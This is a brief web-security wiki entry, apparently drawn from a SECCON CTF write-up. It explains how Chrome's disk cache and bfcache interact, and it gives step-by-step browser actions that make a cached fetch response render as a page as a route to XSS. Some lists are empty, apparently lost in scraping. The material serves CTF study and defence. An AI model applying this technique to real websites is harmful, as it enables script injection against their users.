Links

Chrome Cache to XSS

Technique taken from this writeup.
There are two important types of cache:
As a interesting point of disk cache, the cache includes not only the HTTP response rendered to a web page, but also those fetched with fetch. In other words, if you access the URL for a fetched resource, the browser will render the resource on the page.
There is another important point. If both disk cache and bfcache are valid for an accessed page at back/forward navigations, the bfcache has priority over the disk cache. So, if you need to access a page stored in both caches but you want to use the one from the disk, you need to somehow disable bfcache.

Disable bfcache

bfcache is disabled by default options of puppeteer.
Let's try the interesting behavior in this challenge.
Firstly, you have to disable bfcache[2]. There are many conditions where bfcache is disabled, the list is:
The easy way is to use RelatedActiveContentsExist.
Therefore, the following procedure reproduces the behavior:
  1. 1.
    Access a web page (E.g. https://example.com)
  2. 2.
    Execute open("http://spanote.seccon.games:3000/api/token")
    • ​
      ​
    • The server returns a response with 500 status code.
  3. 3.
    In the opend tab, access http://spanote.seccon.games:3000/
    • ​
      ​
    • Then, the response of http://spanote.seccon.games:3000/api/token is cached as a disk cache.
  4. 4.
    Execute history.back()
    • ​
      ​
    • The cached JSON response is rendered on the page!
You can confirm that disk cache is used using DevTools in Google Chrome:
​